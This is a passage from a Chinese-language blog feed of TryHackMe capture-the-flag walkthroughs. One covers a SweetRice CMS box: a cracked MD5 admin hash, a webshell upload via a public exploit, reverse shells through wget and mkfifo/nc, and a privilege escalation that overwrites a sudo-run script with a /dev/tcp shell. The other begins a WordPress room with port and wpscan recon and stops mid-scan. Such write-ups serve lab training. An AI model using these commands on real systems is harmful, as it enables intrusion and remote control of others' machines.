&lt;li&gt;裡面有寫到他的版本是 &lt;code&gt;1.5&lt;/code&gt;尋找 Exploit- 找到了適用的 Exploit，不過需要使用者帳號跟密碼&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.exploit-db.com/exploits/40716"&gt;https://www.exploit-db.com/exploits/40716&lt;/a&gt;繼續掃路徑- 找到一個 &lt;code&gt;mysql_backup&lt;/code&gt;http://10.10.40.99/content/inc/mysql_backup/&lt;/li&gt;
&lt;li&gt;裡面有一個備份的 SQL 檔案&lt;/li&gt;
&lt;li&gt;內部有一些看起來是 PHP 序列話的東西&lt;code&gt;5:\\&amp;quot;admin\\&amp;quot;;s:7:\\&amp;quot;manager\\&amp;quot;;s:6:\\&amp;quot;passwd\\&amp;quot;;s:32:\\&amp;quot;42f749ade7f9e195bf475f37a44cafcb\\&amp;quot;;&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5cf93-EAMeYsa.png"&gt;&lt;/li&gt;
&lt;li&gt;看的出來&lt;code&gt;admin&lt;/code&gt; : &lt;code&gt;manager&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;passwd&lt;/code&gt; : &lt;code&gt;42f749ade7f9e195bf475f37a44cafcb&lt;/code&gt;透過 Google 尋找- Sweet Rice CMS 的後台是 &lt;code&gt;/as&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;http://10.10.40.99/content/as/嘗試登入- 帳號 : &lt;code&gt;manager&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;密碼 : &lt;code&gt;42f749ade7f9e195bf475f37a44cafcb&lt;/code&gt;登入失敗&lt;/li&gt;
&lt;li&gt;正常人也不太可能用這種東西作為密碼&lt;/li&gt;
&lt;li&gt;拿去 Google 後發現是 MD5可以透過這個網站解碼 &lt;a href="https://md5.gromweb.com/?md5=42f749ade7f9e195bf475f37a44cafcb"&gt;https://md5.gromweb.com/?md5=42f749ade7f9e195bf475f37a44cafcb&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/56a50-dD3gjq5.png"&gt;&lt;/li&gt;
&lt;li&gt;所以答案是 &lt;code&gt;Password123&lt;/code&gt;登入成功&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/37dc2-0KYq7Vr.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="exploit"&gt;Exploit&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;下載檔案&lt;code&gt;wget https://www.exploit-db.com/download/40716 -O 40716.py``python3 40716.py&lt;/code&gt; 執行並輸入需要的資料- &lt;code&gt;10.10.40.99/content&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;manager&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Password123&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;webshell.php5&lt;/code&gt;這邊我嘗試了 &lt;code&gt;webshell.php&lt;/code&gt; 但是失敗&lt;/li&gt;
&lt;li&gt;根據Exploit提示的改用 &lt;code&gt;webshell.php5&lt;/code&gt; 就可以ㄌ&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5f910-rXuDNVF.png"&gt;使用 Webshell- 可以成功連上&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2de63-jlR37Zn.png"&gt;改接 Reverse shell- &lt;code&gt;http://10.10.40.99/content/attachment/webshell.php5?A=wget%2010.13.21.55:8000/s%20-O%20/tmp/s&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;本地端執行 &lt;code&gt;nc -nlvp 7877&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;網址shell &lt;code&gt;bash /tmp/s&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;就順利接上ㄌ&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4fb79-AtRVVea.png"&gt;取得 Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c69e4-19Vfvm4.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="準備提權"&gt;準備提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;家目錄看到一組帳號密碼，先存下來&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/723bb-cxcqYN8.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;rice:randompass&lt;/code&gt;透過 &lt;code&gt;sudo -l&lt;/code&gt; 發現我們可以用 sudo 執行這一段 Perl- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b8c21-SBhtfeX.png"&gt;&lt;/li&gt;
&lt;li&gt;而這一段 perl 會用 sh 呼叫 &lt;code&gt;/etc/copy.sh&lt;/code&gt;觀察 &lt;code&gt;ls -al /etc/copy.sh&lt;/code&gt;- 可以發現我們有 Write 的權限&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/404e8-c957GVn.png"&gt;先把 &lt;code&gt;/etc/copy.sh&lt;/code&gt; 備份一下以免搞壞- &lt;code&gt;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&amp;gt;&amp;amp;1|nc 192.168.0.190 5554 &amp;gt;/tmp/f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/dc0a3-1wXCkEG.png"&gt;寫入我們的 Reverse shell- &lt;code&gt;echo &amp;quot;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7878 0&amp;gt;&amp;amp;1'&amp;quot; &amp;gt; /etc/copy.sh&lt;/code&gt;監聽 Reverse shell- &lt;code&gt;nc -nvlp 7878&lt;/code&gt;執行 Reverse shell- &lt;code&gt;sudo /usr/bin/perl /home/itguy/backup.pl&lt;/code&gt;取得 Root- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/daaf8-Ud0s3aW.png"&gt;取得 Root Flag&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Blog (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/08/blog-try-hack-me-writeup/</link><pubDate>Sun, 08 Aug 2021 23:53:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/08/blog-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/blog"&gt;https://tryhackme.com/room/blog&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.175.75&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;老梗先用 rustscan 掃一下&lt;code&gt;rustscan -a 10.10.175.75&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f2d47-OtN6JLT.png"&gt;&lt;/li&gt;
&lt;li&gt;可以看出開的 port 有22&lt;/li&gt;
&lt;li&gt;80&lt;/li&gt;
&lt;li&gt;139&lt;/li&gt;
&lt;li&gt;445接下來用 nmap 做進一步的掃瞄- &lt;code&gt;nmap -A -p22,80,139,445 10.10.175.75&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/21bf3-PbaV27j.png"&gt;&lt;/li&gt;
&lt;li&gt;可以看出http-generator: WordPress 5.0What version of the above CMS was being used?- &lt;code&gt;5.0&lt;/code&gt;What CMS was Billy using?- &lt;code&gt;WordPress&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="web"&gt;Web&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;在文章內容中，可以看到有兩個作者Billy Joel帳號 :&lt;code&gt;bjoel&lt;/code&gt;Karen Wheeler- 帳號 : &lt;code&gt;kwheel&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Joel 的媽媽發現網頁會自動跳轉到 &lt;code&gt;blog.thm&lt;/code&gt;- 這是 Wordpress 的一個問題，第一次進入就會在 DB 寫死 Domain name 並自動跳轉&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/965fa-mpMQnDY.png"&gt;&lt;/li&gt;
&lt;li&gt;我們可以透過修改 &lt;code&gt;/etc/hosts&lt;/code&gt; 把 IP 綁上 domain&lt;code&gt;sudo vim /etc/hosts&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;裡面加上一行 &lt;code&gt;10.10.175.75 blog.thm&lt;/code&gt;用 dirsearch 掃一次看看- &lt;code&gt;python3 dirsearch.py -u http://blog.thm/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;沒有什麼特別的結果，就是 Wordpress 該有的東西而已使用 WPScan，一款針對 Wordpress 的掃描器- 可以掃描出該網站有使用哪一些套件等&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wpscan --update&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wpscan --url http://blog.thm&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cac36-IH2DsaZ.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-gdscript3" data-lang="gdscript3"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;└─&lt;span style="color:#ff79c6"&gt;$&lt;/span&gt; wpscan &lt;span style="color:#ff79c6"&gt;--&lt;/span&gt;url http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;_______________________________________________________________
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; __ _______ _____
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; \ \ &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; __ \ &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; ____&lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; \ \ &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;\ &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;/|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;__) &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; (___ ___ __ _ _ __ ®
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; \ \&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; \&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; ___&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; \___ \ &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; __&lt;span style="color:#ff79c6"&gt;|/&lt;/span&gt; _` &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;_ &lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt; \ /\ / | | ____) | (__| (_| | | | |&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; \&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; \&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;_&lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;_____&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; \___&lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;\__,_&lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;_&lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;_&lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; WordPress Security Scanner by the WPScan Team
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Version &lt;span style="color:#bd93f9"&gt;3.8&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;17&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Sponsored by Automattic &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;automattic&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;com&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;_______________________________________________________________
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] URL: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; [&lt;span style="color:#bd93f9"&gt;10.10&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;175.75&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Started: Sat Aug &lt;span style="color:#bd93f9"&gt;7&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;01&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;16&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;33&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;2021&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Interesting Finding(s):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Headers
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Interesting Entry: Server: Apache&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;2.4&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;29&lt;/span&gt; (Ubuntu)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Headers (Passive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Confidence: &lt;span style="color:#bd93f9"&gt;100&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] robots&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;txt found: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;robots&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Interesting Entries:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wp&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;admin&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wp&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;admin&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;admin&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;ajax&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;php
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Robots Txt (Aggressive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Confidence: &lt;span style="color:#bd93f9"&gt;100&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] XML&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;RPC seems to be enabled: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;xmlrpc&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;php
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Direct Access (Aggressive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Confidence: &lt;span style="color:#bd93f9"&gt;100&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; References:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;codex&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;wordpress&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;org&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;XML&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;RPC_Pingback_API
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;www&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;rapid7&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;com&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;db&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;modules&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;auxiliary&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;scanner&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;http&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wordpress_ghost_scanner&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;www&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;rapid7&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;com&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;db&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;modules&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;auxiliary&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;dos&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;http&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wordpress_xmlrpc_dos&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;www&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;rapid7&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;com&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;db&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;modules&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;auxiliary&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;scanner&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;http&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wordpress_xmlrpc_login&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;www&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;rapid7&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;com&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;db&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;modules&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;auxiliary&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;scanner&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;http&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wordpress_pingback_access&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] WordPress readme found: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;readme&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Direct Access (Aggressive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Confidence: &lt;span style="color:#bd93f9"&gt;100&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Upload directory has listing enabled: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wp&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;content&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;uploads&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Direct Access (Aggressive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Confidence: &lt;span style="color:#bd93f9"&gt;100&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] The external WP&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;Cron seems to be enabled: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wp&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;cron&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;php
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Direct Access (Aggressive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Confidence: &lt;span style="color:#bd93f9"&gt;60&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; References:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;www&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;iplocation&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;net&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;defend&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;wordpress&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;from&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;ddos
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;github&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;com&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wpscanteam&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wpscan&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;issues&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;1299&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] WordPress version &lt;span style="color:#bd93f9"&gt;5.0&lt;/span&gt; identified (Insecure, released on &lt;span style="color:#bd93f9"&gt;2018&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;12&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;06&lt;/span&gt;)&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;
